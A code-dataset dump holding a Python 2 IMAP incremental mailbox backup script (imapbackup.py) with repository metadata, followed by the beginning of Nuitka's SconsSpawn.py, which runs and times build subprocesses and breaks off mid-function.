hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a0f0feb0ef3cd24b28f28e8a3c9051151900b19
| 28,185
|
py
|
Python
|
imapbackup.py
|
lpirl/imapbackup
|
167c927d4683487132388db53c6bbaaad258b863
|
[
"MIT"
] | null | null | null |
imapbackup.py
|
lpirl/imapbackup
|
167c927d4683487132388db53c6bbaaad258b863
|
[
"MIT"
] | null | null | null |
imapbackup.py
|
lpirl/imapbackup
|
167c927d4683487132388db53c6bbaaad258b863
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python -u
"""IMAP Incremental Backup Script"""
__version__ = "1.4h"
__author__ = "Rui Carmo (http://taoofmac.com)"
__copyright__ = "(C) 2006-2018 Rui Carmo. Code under MIT License.(C)"
__contributors__ = "jwagnerhki, Bob Ippolito, Michael Leonhard, Giuseppe Scrivano <gscrivano@gnu.org>, Ronan Sheth, Brandon Long, Christian Schanz, A. Bovett, Mark Feit"
# = Contributors =
# http://github.com/markfeit: Allow password to be read from a file
# http://github.com/jwagnerhki: fix for message_id checks
# A. Bovett: Modifications for Thunderbird compatibility and disabling spinner in Windows
# Christian Schanz: added target directory parameter
# Brandon Long (Gmail team): Reminder to use BODY.PEEK instead of BODY
# Ronan Sheth: hashlib patch (this now requires Python 2.5, although reverting it back is trivial)
# Giuseppe Scrivano: Added support for folders.
# Michael Leonhard: LIST result parsing, SSL support, revamped argument processing,
# moved spinner into class, extended recv fix to Windows
# Bob Ippolito: fix for MemoryError on socket recv, http://python.org/sf/1092502
# Rui Carmo: original author, up to v1.2e
# = TODO =
# - Add proper exception handlers to scanFile() and downloadMessages()
# - Migrate mailbox usage from rfc822 module to email module
# - Investigate using the noseek mailbox/email option to improve speed
# - Use the email module to normalize downloaded messages
# and add missing Message-Id
# - Test parseList() and its descendents on other imapds
# - Test bzip2 support
# - Add option to download only subscribed folders
# - Add regex option to filter folders
# - Use a single IMAP command to get Message-IDs
# - Use a single IMAP command to fetch the messages
# - Patch Python's ssl module to do proper checking of certificate chain
# - Patch Python's ssl module to raise good exceptions
# - Submit patch of socket._fileobject.read
# - Improve imaplib module with LIST parsing code, submit patch
# DONE:
# v1.4h
# - Add timeout option
# v1.3c
# - Add SSL support
# - Support host:port
# - Cleaned up code using PyLint to identify problems
# pylint -f html --indent-string=" " --max-line-length=90 imapbackup.py > report.html
import bz2
import errno
import gc
import getopt
import getpass
import gzip
import hashlib
import imaplib
import mailbox
import os
import platform
import re
import socket
import sys
import time
class SkipFolderException(Exception):
    """Raised to abort processing of the current folder and move on to the next."""
class Spinner:
    """Shows a status message followed by a small rotating progress glyph.

    The glyph is only drawn when stdin is a TTY and spinning was not
    disabled, so log output stays clean in batch runs.
    """

    def __init__(self, message, nospinner):
        """Emit *message* immediately and draw the first glyph."""
        self.glyphs = "|/-\\"
        self.pos = 0
        self.message = message
        self.nospinner = nospinner
        sys.stdout.write(message)
        sys.stdout.flush()
        self.spin()

    def spin(self):
        """Advance the glyph by one step (no-op when disabled or not a TTY)."""
        if self.nospinner or not sys.stdin.isatty():
            return
        sys.stdout.write("\r%s %s" % (self.message, self.glyphs[self.pos]))
        sys.stdout.flush()
        self.pos = (self.pos + 1) % len(self.glyphs)

    def stop(self):
        """Blank out the glyph, leaving just the message on the line."""
        if self.nospinner or not sys.stdin.isatty():
            return
        sys.stdout.write("\r%s " % self.message)
        sys.stdout.write("\r" + self.message)
        sys.stdout.flush()
def pretty_byte_count(num):
    """Converts integer into a human friendly count of bytes, eg: 12.243 MB"""
    if num == 1:
        return "1 byte"
    if num < 1024:
        return "%s bytes" % num
    # Each tier covers [divisor, divisor * 1024)
    for fmt, divisor in (("%.2f KB", 1024.0),
                         ("%.3f MB", 1048576.0),
                         ("%.3f GB", 1073741824.0)):
        if num < divisor * 1024:
            return fmt % (num / divisor)
    return "%.3f TB" % (num / 1099511627776.0)
# Regular expressions for parsing.
# Raw strings avoid the invalid '\-'/'\:'/'\s' string escapes (a
# DeprecationWarning on Python 3.6+, a SyntaxError in future versions);
# flags are combined with '|', the documented way (the old '+' only worked
# because the flag values are distinct bits).
MSGID_RE = re.compile(r"^Message\-Id\: (.+)", re.IGNORECASE | re.MULTILINE)
BLANKS_RE = re.compile(r'\s+', re.MULTILINE)

# Constants
UUID = '19AF1258-1AAF-44EF-9D9A-731079D6FAD7'  # Used to generate Message-Ids
def string_from_file(value):
    """
    Return *value* itself, or the contents of the file it points to.

    A leading '@' means "treat the rest as a path and read that file";
    a leading backslash escapes the '@' so it can be used literally.
    """
    assert isinstance(value, basestring)

    # Plain strings (and the empty string) pass straight through
    if not value:
        return value
    prefix = value[0]
    if prefix == "\\":
        # escaped: drop the backslash, keep the rest verbatim
        return value[1:]
    if prefix != "@":
        return value

    with open(os.path.expanduser(value[1:]), 'r') as content:
        return content.read().strip()
def download_messages(server, filename, messages, config):
    """Download messages from the currently selected folder, append to mailbox.

    server   -- logged-in imaplib connection; the folder was already selected
                by scan_folder()
    messages -- dict of message-id -> message number for messages to fetch
    config   -- option dict (uses 'overwrite', 'compress', 'thunderbird',
                'nospinner')

    NOTE(review): returns [] on the overwrite path but implicitly None
    otherwise — callers ignore the return value, but confirm before using it.
    """
    if config['overwrite']:
        if os.path.exists(filename):
            print "Deleting", filename
            os.remove(filename)
        return []
    else:
        # appending to .bz2 is unsupported; check_config() rejects that combo
        assert('bzip2' != config['compress'])

    # Open disk file
    if config['compress'] == 'gzip':
        # compression level 9: smallest archive, slowest append
        mbox = gzip.GzipFile(filename, 'ab', 9)
    elif config['compress'] == 'bzip2':
        mbox = bz2.BZ2File(filename, 'wb', 512*1024, 9)
    else:
        mbox = file(filename, 'ab')

    # the folder has already been selected by scanFolder()
    # nothing to do
    if not len(messages):
        print "New messages: 0"
        mbox.close()
        return

    spinner = Spinner("Downloading %s new messages to %s" % (len(messages), filename),
                      config['nospinner'])
    total = biggest = 0

    # each new message
    for msg_id in messages.keys():

        # This "From" and the terminating newline below delimit messages
        # in mbox files. Note that RFC 4155 specifies that the date be
        # in the same format as the output of ctime(3), which is required
        # by ISO C to use English day and month abbreviations.
        buf = "From nobody %s\n" % time.ctime()
        # If this is one of our synthesised Message-IDs, insert it before
        # the other headers
        if UUID in msg_id:
            buf = buf + "Message-Id: %s\n" % msg_id
        mbox.write(buf)

        # fetch message (RFC822 = the full raw message)
        typ, data = server.fetch(messages[msg_id], "RFC822")
        assert('OK' == typ)
        text = data[0][1].strip().replace('\r', '')
        if config['thunderbird']:
            # This avoids Thunderbird mistaking a line starting "From " as the start
            # of a new message. _Might_ also apply to other mail clients - unknown
            text = text.replace("\nFrom ", "\n From ")
        mbox.write(text)
        mbox.write('\n\n')

        size = len(text)
        biggest = max(size, biggest)
        total += size

        # drop the (potentially large) fetch response before the next one
        del data
        gc.collect()
        spinner.spin()

    mbox.close()
    spinner.stop()
    print ": %s total, %s for largest message" % (pretty_byte_count(total),
                                                  pretty_byte_count(biggest))
def scan_file(filename, compress, overwrite, nospinner):
    """Gets IDs of messages in the specified mbox file.

    Returns a dict mapping msg_id -> msg_id (used as a set); empty when the
    file does not exist or is about to be overwritten anyway.
    """
    # file will be overwritten
    if overwrite:
        return []
    else:
        # appending to .bz2 is unsupported; check_config() rejects that combo
        assert('bzip2' != compress)

    # file doesn't exist
    if not os.path.exists(filename):
        print "File %s: not found" % filename
        return []

    spinner = Spinner("File %s" % filename, nospinner)

    # open the file with the matching decompressor
    if compress == 'gzip':
        mbox = gzip.GzipFile(filename, 'rb')
    elif compress == 'bzip2':
        mbox = bz2.BZ2File(filename, 'rb')
    else:
        mbox = file(filename, 'rb')

    messages = {}

    # each message
    i = 0
    for message in mailbox.PortableUnixMailbox(mbox):
        header = ''
        # We assume all messages on disk have message-ids
        try:
            header = ''.join(message.getfirstmatchingheader('message-id'))
        except KeyError:
            # No message ID was found. Warn the user and move on
            print
            print "WARNING: Message #%d in %s" % (i, filename),
            print "has no Message-Id header."

        # collapse folded/多-line headers to a single line before matching
        header = BLANKS_RE.sub(' ', header.strip())

        try:
            msg_id = MSGID_RE.match(header).group(1)
            if msg_id not in messages.keys():
                # avoid adding dupes
                messages[msg_id] = msg_id
        except AttributeError:
            # Message-Id was found but could somehow not be parsed by regexp
            # (highly bloody unlikely)
            print
            print "WARNING: Message #%d in %s" % (i, filename),
            print "has a malformed Message-Id header."
        spinner.spin()
        i = i + 1

    # done
    mbox.close()
    spinner.stop()
    print ": %d messages" % (len(messages.keys()))
    return messages
def scan_folder(server, foldername, nospinner):
    """Gets IDs of messages in the specified folder, returns id:num dict.

    Selects the folder read-only, fetches only headers with BODY.PEEK so no
    message gets marked as read, and synthesises a deterministic surrogate
    Message-Id (UUID + SHA1 of key headers) for messages that lack one.
    May raise SkipFolderException when SELECT or FETCH fails.
    """
    messages = {}
    # quote the mailbox name: it may contain spaces or other specials
    foldername = '"{}"'.format(foldername)
    spinner = Spinner("Folder %s" % foldername, nospinner)
    try:
        typ, data = server.select(foldername, readonly=True)
        if 'OK' != typ:
            raise SkipFolderException("SELECT failed: %s" % data)
        # SELECT's untagged EXISTS count arrives as data[0]
        num_msgs = int(data[0])

        # each message
        for num in range(1, num_msgs+1):
            # Retrieve Message-Id, making sure we don't mark all messages as read
            typ, data = server.fetch(
                num, '(BODY.PEEK[HEADER.FIELDS (MESSAGE-ID)])')
            if 'OK' != typ:
                raise SkipFolderException("FETCH %s failed: %s" % (num, data))

            header = data[0][1].strip()
            # remove newlines inside Message-Id (a dumb Exchange trait)
            header = BLANKS_RE.sub(' ', header)
            try:
                msg_id = MSGID_RE.match(header).group(1)
                if msg_id not in messages.keys():
                    # avoid adding dupes
                    messages[msg_id] = num
            except (IndexError, AttributeError):
                # Some messages may have no Message-Id, so we'll synthesise one
                # (this usually happens with Sent, Drafts and .Mac news)
                typ, data = server.fetch(
                    num, '(BODY[HEADER.FIELDS (FROM TO CC DATE SUBJECT)])')
                if 'OK' != typ:
                    raise SkipFolderException(
                        "FETCH %s failed: %s" % (num, data))
                header = data[0][1].strip()
                header = header.replace('\r\n', '\t')
                messages['<' + UUID + '.' +
                         hashlib.sha1(header).hexdigest() + '>'] = num
            spinner.spin()
    finally:
        # always stop the spinner, even when skipping the folder
        spinner.stop()
        print ":",

    # done
    print "%d messages" % (len(messages.keys()))
    return messages
def parse_paren_list(row):
    """Parse the parenthesised name-attribute list heading a LIST response.

    Returns a (parsed_list, remainder_of_row) pair; nested parentheses
    become nested lists.
    """
    # eat starting paren
    assert(row[0] == '(')
    remainder = row[1:]
    parsed = []

    # NOTE: RFC3501 doesn't fully define the format of name attributes
    attrib_pattern = re.compile(r"^\s*(\\[a-zA-Z0-9_]+)\s*")

    # consume entries until the matching closing paren
    while remainder[0] != ')':
        if remainder[0] == '(':
            # nested attribute list: recurse
            nested, remainder = parse_paren_list(remainder)
            parsed.append(nested)
        else:
            # single name attribute like "\HasNoChildren"
            match = attrib_pattern.search(remainder)
            assert(match is not None)
            parsed.append(remainder[match.start():match.end()].strip())
            remainder = remainder[match.end():]

    # eat the closing paren and hand back whatever follows it
    return parsed, remainder[1:]
def parse_string_list(row):
    """Split the tail of a LIST response into its string fields.

    Handles both double-quoted strings (quotes removed) and bare atoms.
    """
    pieces = re.compile(r'\s*(?:"([^"]+)")\s*|\s*(\S+)\s*').split(row)
    return [piece for piece in pieces if piece]
def parse_list(row):
    """Parse one full LIST response line into [attribs, delimiter, name]."""
    paren_part, remainder = parse_paren_list(row.strip())
    fields = parse_string_list(remainder)
    # a LIST line carries exactly the hierarchy delimiter and the mailbox name
    assert(len(fields) == 2)
    return [paren_part] + fields
def get_hierarchy_delimiter(server):
    """Queries the imapd for the hierarchy delimiter, eg. '.' in INBOX.Sent"""
    # see RFC 3501 page 39 paragraph 4
    typ, data = server.list('', '')
    assert(typ == 'OK')
    assert(len(data) == 1)

    # the single row parses to [attribs, hierarchy delimiter, root name]
    delimiter = parse_list(data[0])[1]
    if 'NIL' == delimiter:
        # NIL means the server has no hierarchy; pick a sane default
        delimiter = '.'
    return delimiter
def get_names(server, compress, thunderbird, nospinner):
    """Get list of folders, returns [(FolderName,FileName)].

    The on-disk filename is derived from the IMAP folder path: hierarchy
    levels become '.sbd/' directories in Thunderbird mode, dotted segments
    otherwise, plus the extension matching the compression mode.
    """
    spinner = Spinner("Finding Folders", nospinner)

    # Get hierarchy delimiter
    delim = get_hierarchy_delimiter(server)
    spinner.spin()

    # Get LIST of all folders
    typ, data = server.list()
    assert(typ == 'OK')
    spinner.spin()

    names = []

    # parse each LIST, find folder name
    for row in data:
        lst = parse_list(row)
        foldername = lst[2]
        # extension keyed by compression mode
        suffix = {'none': '', 'gzip': '.gz', 'bzip2': '.bz2'}[compress]
        if thunderbird:
            # Thunderbird stores sub-folders in ".sbd" directories and
            # expects the inbox to be named "Inbox"
            filename = '.sbd/'.join(foldername.split(delim)) + suffix
            if filename.startswith("INBOX"):
                filename = filename.replace("INBOX", "Inbox")
        else:
            filename = '.'.join(foldername.split(delim)) + '.mbox' + suffix
        # print "\n*** Folder:", foldername # *DEBUG
        # print "*** File:", filename # *DEBUG
        names.append((foldername, filename))

    # done
    spinner.stop()
    print ": %s folders" % (len(names))
    return names
def print_usage():
    """Print the command-line help text and exit with status 2."""
    # NOTE(review): process_cline() actually accepts --keyfile=/--certfile=,
    # but the text below advertises --key=/--cert= — confirm which spelling
    # is intended and make them agree.
    # " "
    print "Usage: imapbackup [OPTIONS] -s HOST -u USERNAME [-p PASSWORD]"
    print " -a --append-to-mboxes Append new messages to mbox files. (default)"
    print " -y --yes-overwrite-mboxes Overwite existing mbox files instead of appending."
    print " -n --compress=none Use one plain mbox file for each folder. (default)"
    print " -z --compress=gzip Use mbox.gz files. Appending may be very slow."
    print " -b --compress=bzip2 Use mbox.bz2 files. Appending not supported: use -y."
    print " -f --=folder Specifify which folders use. Comma separated list."
    print " -e --ssl Use SSL. Port defaults to 993."
    print " -k KEY --key=KEY PEM private key file for SSL. Specify cert, too."
    print " -c CERT --cert=CERT PEM certificate chain for SSL. Specify key, too."
    print " Python's SSL module doesn't check the cert chain."
    print " -s HOST --server=HOST Address of server, port optional, eg. mail.com:143"
    print " -u USER --user=USER Username to log into server"
    print " -p PASS --pass=PASS Prompts for password if not specified. If the first"
    print " character is '@', treat the rest as a path to a file"
    print " containing the password. Leading '\' makes it literal."
    print " -t SECS --timeout=SECS Sets socket timeout to SECS seconds."
    print " --thunderbird Create Mozilla Thunderbird compatible mailbox"
    print " --nospinner Disable spinner (makes output log-friendly)"
    print "\nNOTE: mbox files are created in the current working directory."
    sys.exit(2)
def process_cline():
    """Uses getopt to process command line, returns (config, warnings, errors).

    config is a dict of the recognised options (values are raw strings;
    check_config() converts port/timeout to ints); warnings and errors are
    lists of message strings.
    """
    # read command line
    try:
        # Every value-taking short option needs a ':' and every value-taking
        # long option needs a trailing '='. Previously "k" lacked its ':' and
        # "timeout" lacked its '=', so "-k KEY" stopped option parsing at the
        # key path and "--timeout SECS" left SECS behind as a stray argument.
        short_args = "aynzbek:t:c:s:u:p:f:"
        long_args = ["append-to-mboxes", "yes-overwrite-mboxes", "compress=",
                     "ssl", "timeout=", "keyfile=", "certfile=", "server=", "user=", "pass=",
                     "folders=", "thunderbird", "nospinner"]
        opts, extraargs = getopt.getopt(sys.argv[1:], short_args, long_args)
    except getopt.GetoptError:
        print_usage()

    warnings = []
    config = {'compress': 'none', 'overwrite': False, 'usessl': False,
              'thunderbird': False, 'nospinner': False}
    errors = []

    # empty command line
    if not len(opts) and not len(extraargs):
        print_usage()

    # process each command line option, save in config
    for option, value in opts:
        if option in ("-a", "--append-to-mboxes"):
            config['overwrite'] = False
        elif option in ("-y", "--yes-overwrite-mboxes"):
            warnings.append("Existing mbox files will be overwritten!")
            config["overwrite"] = True
        elif option == "-n":
            config['compress'] = 'none'
        elif option == "-z":
            config['compress'] = 'gzip'
        elif option == "-b":
            config['compress'] = 'bzip2'
        elif option == "--compress":
            if value in ('none', 'gzip', 'bzip2'):
                config['compress'] = value
            else:
                errors.append("Invalid compression type specified.")
        elif option in ("-e", "--ssl"):
            config['usessl'] = True
        elif option in ("-k", "--keyfile"):
            config['keyfilename'] = value
        elif option in ("-f", "--folders"):
            config['folders'] = value
        elif option in ("-c", "--certfile"):
            config['certfilename'] = value
        elif option in ("-s", "--server"):
            config['server'] = value
        elif option in ("-u", "--user"):
            config['user'] = value
        elif option in ("-p", "--pass"):
            try:
                # '@path' means "read the password from this file"
                config['pass'] = string_from_file(value)
            except Exception as ex:
                errors.append("Can't read password: %s" % (str(ex)))
        elif option in ("-t", "--timeout"):
            # kept as a string here; check_config() validates and converts
            config['timeout'] = value
        elif option == "--thunderbird":
            config['thunderbird'] = True
        elif option == "--nospinner":
            config['nospinner'] = True
        else:
            errors.append("Unknown option: " + option)

    # don't ignore extra arguments
    for arg in extraargs:
        errors.append("Unknown argument: " + arg)

    # done processing command line
    return config, warnings, errors
def check_config(config, warnings, errors):
    """Validate option combinations; returns the (config, warnings, errors) triple.

    Also normalises 'server' (splitting off an optional :port) and converts
    'port' and 'timeout' to integers, appending messages for any problems.
    """
    append_mode = config['overwrite'] is False
    if config['compress'] == 'bzip2' and append_mode:
        errors.append(
            "Cannot append new messages to mbox.bz2 files. Please specify -y.")
    if config['compress'] == 'gzip' and append_mode:
        warnings.append(
            "Appending new messages to mbox.gz files is very slow. Please Consider\n"
            " using -y and compressing the files yourself with gzip -9 *.mbox")

    for required, message in (('server', "No server specified."),
                              ('user', "No username specified.")):
        if required not in config:
            errors.append(message)

    has_key = 'keyfilename' in config
    has_cert = 'certfilename' in config
    if has_key != has_cert:
        errors.append("Please specify both key and cert or neither.")
    if has_key and not config['usessl']:
        errors.append("Key specified without SSL. Please use -e or --ssl.")
    if has_cert and not config['usessl']:
        errors.append(
            "Certificate specified without SSL. Please use -e or --ssl.")

    if 'server' in config and ':' in config['server']:
        # split "host:port" and keep just the host in 'server'
        host, _, port_text = config['server'].partition(':')
        config['server'] = host
        if port_text:
            try:
                port = int(port_text)
                if not 0 <= port <= 65535:
                    raise ValueError
                config['port'] = port
            except ValueError:
                errors.append(
                    "Invalid port. Port must be an integer between 0 and 65535.")

    if 'timeout' in config:
        try:
            timeout = int(config['timeout'])
            if timeout <= 0:
                raise ValueError
            config['timeout'] = timeout
        except ValueError:
            errors.append(
                "Invalid timeout value. Must be an integer greater than 0.")

    return config, warnings, errors
def get_config():
    """Gets config from command line and console, returns config.

    Exits with status 2 when validation produced errors; otherwise fills in
    the password (prompting interactively if needed) and port/timeout
    defaults.
    """
    # config = {
    #   'compress': 'none' or 'gzip' or 'bzip2'
    #   'overwrite': True or False
    #   'server': String
    #   'port': Integer
    #   'user': String
    #   'pass': String
    #   'usessl': True or False
    #   'keyfilename': String or None
    #   'certfilename': String or None
    # }

    config, warnings, errors = process_cline()
    config, warnings, errors = check_config(config, warnings, errors)

    # show warnings
    for warning in warnings:
        print "WARNING:", warning

    # show errors, exit
    for error in errors:
        print "ERROR", error
    if len(errors):
        sys.exit(2)

    # prompt for password, if necessary
    if 'pass' not in config:
        config['pass'] = getpass.getpass()

    # defaults
    if 'port' not in config:
        if config['usessl']:
            config['port'] = 993  # standard IMAPS port
        else:
            config['port'] = 143  # standard plain IMAP port
    if 'timeout' not in config:
        config['timeout'] = 60

    # done!
    return config
def connect_and_login(config):
"""Connects to the server and logs in. Returns IMAP4 object."""
try:
assert(not (('keyfilename' in config) ^ ('certfilename' in config)))
if config['timeout']:
socket.setdefaulttimeout(config['timeout'])
if config['usessl'] and 'keyfilename' in config:
print "Connecting to '%s' TCP port %d," % (
config['server'], config['port']),
print "SSL, key from %s," % (config['keyfilename']),
print "cert from %s " % (config['certfilename'])
server = imaplib.IMAP4_SSL(config['server'], config['port'],
config['keyfilename'], config['certfilename'])
elif config['usessl']:
print "Connecting to '%s' TCP port %d, SSL" % (
config['server'], config['port'])
server = imaplib.IMAP4_SSL(config['server'], config['port'])
else:
print "Connecting to '%s' TCP port %d" % (
config['server'], config['port'])
server = imaplib.IMAP4(config['server'], config['port'])
# speed up interactions on TCP connections using small packets
server.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
print "Logging in as '%s'" % (config['user'])
server.login(config['user'], config['pass'])
except socket.gaierror, e:
(err, desc) = e
print "ERROR: problem looking up server '%s' (%s %s)" % (
config['server'], err, desc)
sys.exit(3)
except socket.error, e:
if str(e) == "SSL_CTX_use_PrivateKey_file error":
print "ERROR: error reading private key file '%s'" % (
config['keyfilename'])
elif str(e) == "SSL_CTX_use_certificate_chain_file error":
print "ERROR: error reading certificate chain file '%s'" % (
config['keyfilename'])
else:
print "ERROR: could not connect to '%s' (%s)" % (
config['server'], e)
sys.exit(4)
return server
def create_folder_structure(names):
    """Create the on-disk directory layout needed by the given folders.

    names -- iterable of (imap_foldername, filename) pairs as produced by
             get_names(); only the directory part of each filename is
             created (one level, as get_names() produces at most one).

    Idempotent: an already-existing directory is not an error.
    """
    for imap_foldername, filename in sorted(names):
        disk_foldername = os.path.split(filename)[0]
        if disk_foldername:
            try:
                # print "*** mkdir:", disk_foldername # *DEBUG
                os.mkdir(disk_foldername)
            except OSError as e:
                # 'as' form matches the style already used at the '-p'
                # handler in process_cline(); EEXIST replaces the magic 17
                if e.errno != errno.EEXIST:
                    raise
def main():
    """Main entry point: connect, enumerate folders, sync each to disk."""
    try:
        config = get_config()
        server = connect_and_login(config)
        names = get_names(server, config['compress'], config['thunderbird'],
                          config['nospinner'])

        # optional whitelist from --folders (comma separated folder names)
        if config.get('folders'):
            dirs = map(lambda x: x.strip(), config.get('folders').split(','))
            if config['thunderbird']:
                # get_names() renamed INBOX to Inbox; map user input back
                dirs = [i.replace("Inbox", "INBOX", 1) if i.startswith("Inbox") else i
                        for i in dirs]
            names = filter(lambda x: x[0] in dirs, names)

        # for n, name in enumerate(names): # *DEBUG
        #   print n, name # *DEBUG

        create_folder_structure(names)

        for name_pair in names:
            try:
                foldername, filename = name_pair
                fol_messages = scan_folder(
                    server, foldername, config['nospinner'])
                fil_messages = scan_file(filename, config['compress'],
                                         config['overwrite'], config['nospinner'])

                # download only what the local mbox doesn't already have
                new_messages = {}
                for msg_id in fol_messages.keys():
                    if msg_id not in fil_messages:
                        new_messages[msg_id] = fol_messages[msg_id]

                # for f in new_messages:
                #  print "%s : %s" % (f, new_messages[f])

                download_messages(server, filename, new_messages, config)

            except SkipFolderException, e:
                # a single bad folder shouldn't abort the whole backup
                print e

        print "Disconnecting"
        server.logout()
    except socket.error, e:
        print "ERROR:", e
        sys.exit(4)
    except imaplib.IMAP4.error, e:
        print "ERROR:", e
        sys.exit(5)
# From http://www.pixelbeat.org/talks/python/spinner.py
def cli_exception(typ, value, traceback):
    """Exception hook turning CTRL-C into a clean newline instead of a stack trace."""
    if issubclass(typ, KeyboardInterrupt):
        sys.stdout.write("\n")
        sys.stdout.flush()
    else:
        # anything else gets the standard traceback treatment
        sys.__excepthook__(typ, value, traceback)


# only install the hook for interactive runs
if sys.stdin.isatty():
    sys.excepthook = cli_exception
# Hideous fix to counteract http://python.org/sf/1092502
# (which should have been fixed ages ago.)
# Also see http://python.org/sf/1441530
def _fixed_socket_read(self, size=-1):
    """Replacement for socket._fileobject.read that caps each recv() request.

    The stock implementation could ask recv() for very large buffers at
    once (triggering MemoryError, per the tracker issues above); this
    version never requests more than self._rbufsize per call — see
    "the actual fix" below.
    """
    data = self._rbuf
    if size < 0:
        # Read until EOF
        buffers = []
        if data:
            buffers.append(data)
        self._rbuf = ""
        if self._rbufsize <= 1:
            recv_size = self.default_bufsize
        else:
            recv_size = self._rbufsize
        while True:
            data = self._sock.recv(recv_size)
            if not data:
                break
            buffers.append(data)
        return "".join(buffers)
    else:
        # Read until size bytes or EOF seen, whichever comes first
        buf_len = len(data)
        if buf_len >= size:
            # enough already buffered: serve entirely from the buffer
            self._rbuf = data[size:]
            return data[:size]
        buffers = []
        if data:
            buffers.append(data)
        self._rbuf = ""
        while True:
            left = size - buf_len
            recv_size = min(self._rbufsize, left) # the actual fix
            data = self._sock.recv(recv_size)
            if not data:
                break
            buffers.append(data)
            n = len(data)
            if n >= left:
                # got all we needed; stash any overshoot back into _rbuf
                self._rbuf = data[left:]
                buffers[-1] = data[:left]
                break
            buf_len += n
        return "".join(buffers)
# Platform detection to enable socket patch
# NOTE(review): both branches require Python exactly 2.3.5, so the patch is
# effectively limited to that single interpreter release — confirm that the
# Windows branch (which mentions Python 2.7 below) really intends 2.3.5.
if 'Darwin' in platform.platform() and '2.3.5' == platform.python_version():
    socket._fileobject.read = _fixed_socket_read

# 20181212: Windows 10 + Python 2.7 doesn't need this fix
# (fix leads to error: object of type 'cStringIO.StringO' has no len())
if 'Windows' in platform.platform() and '2.3.5' == platform.python_version():
    socket._fileobject.read = _fixed_socket_read

if __name__ == '__main__':
    gc.enable()
    main()
| 35.542245
| 169
| 0.577009
|
4a0f1011ffbf099c237c4d1374a363f31b3751e6
| 7,267
|
py
|
Python
|
nuitka/build/SconsSpawn.py
|
ronnymajani/Nuitka
|
0083a931e0bd085e4ac9991074b3b8bc05be52b1
|
[
"Apache-2.0"
] | null | null | null |
nuitka/build/SconsSpawn.py
|
ronnymajani/Nuitka
|
0083a931e0bd085e4ac9991074b3b8bc05be52b1
|
[
"Apache-2.0"
] | 1
|
2021-01-05T09:01:31.000Z
|
2021-01-05T09:01:31.000Z
|
nuitka/build/SconsSpawn.py
|
ronnymajani/Nuitka
|
0083a931e0bd085e4ac9991074b3b8bc05be52b1
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Spawning processes.
This is to replace the standard spawn implementation with one that tracks the
progress, and gives warnings about things taking very long.
"""
import os
import subprocess
import threading
from nuitka.Tracing import my_print, scons_logger
from nuitka.utils.Timing import TimerReport
from .SconsCaching import runClCache
from .SconsUtils import decodeData
# Thread class to run a command
class SubprocessThread(threading.Thread):
    """Runs one subprocess on a worker thread so the caller can watch progress."""

    def __init__(self, cmdline, env):
        threading.Thread.__init__(self)

        self.cmdline = cmdline
        self.env = env

        # filled in by run()
        self.data = None
        self.err = None
        self.exit_code = None

        # '%' must be doubled so the repr survives the later %-formatting
        escaped_cmdline = repr(cmdline).replace("%", "%%")
        self.timer_report = TimerReport(
            message="Running %s took %%.2f seconds" % escaped_cmdline,
            min_report_time=60,
            logger=scons_logger,
        )

    def run(self):
        """Execute the command, stashing stdout/stderr/exit code on self."""
        with self.timer_report:
            process = subprocess.Popen(
                self.cmdline,
                stdin=subprocess.PIPE,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                shell=False,
                env=self.env,
            )
            self.data, self.err = process.communicate()
            self.exit_code = process.wait()

    def getProcessResult(self):
        """Return the (stdout, stderr, exit_code) triple captured by run()."""
        return self.data, self.err, self.exit_code
def runProcessMonitored(cmdline, env):
    """Run cmdline on a thread, logging a warning once it exceeds a minute.

    Returns the (stdout, stderr, exit_code) triple of the finished process.
    """
    worker = SubprocessThread(cmdline, env)
    worker.start()

    # Allow a minute before warning for long compile time.
    worker.join(60)
    if worker.is_alive():
        scons_logger.info(
            "Slow C compilation detected, used %.0fs so far, this might indicate scalability problems."
            % worker.timer_report.getTimer().getDelta()
        )

    worker.join()
    return worker.getProcessResult()
# To work around Windows not supporting command lines of greater than 10K by
# default:
def getWindowsSpawnFunction(module_mode, lto_mode, source_files):
    """Build a scons spawn replacement for Windows.

    Handles "del" in-process, routes "<clcache>" through the inline clcache
    copy, and filters the chatty MSVC linker/compiler output so that only
    genuinely unexpected text is echoed.
    """
    def spawnWindowsCommand(
        sh, escape, cmd, args, env
    ):  # pylint: disable=unused-argument

        # The "del" appears to not work reliably, but is used with large amounts of
        # files to link. So, lets do this ourselves, plus it avoids a process
        # spawn.
        if cmd == "del":
            assert len(args) == 2
            os.unlink(args[1])
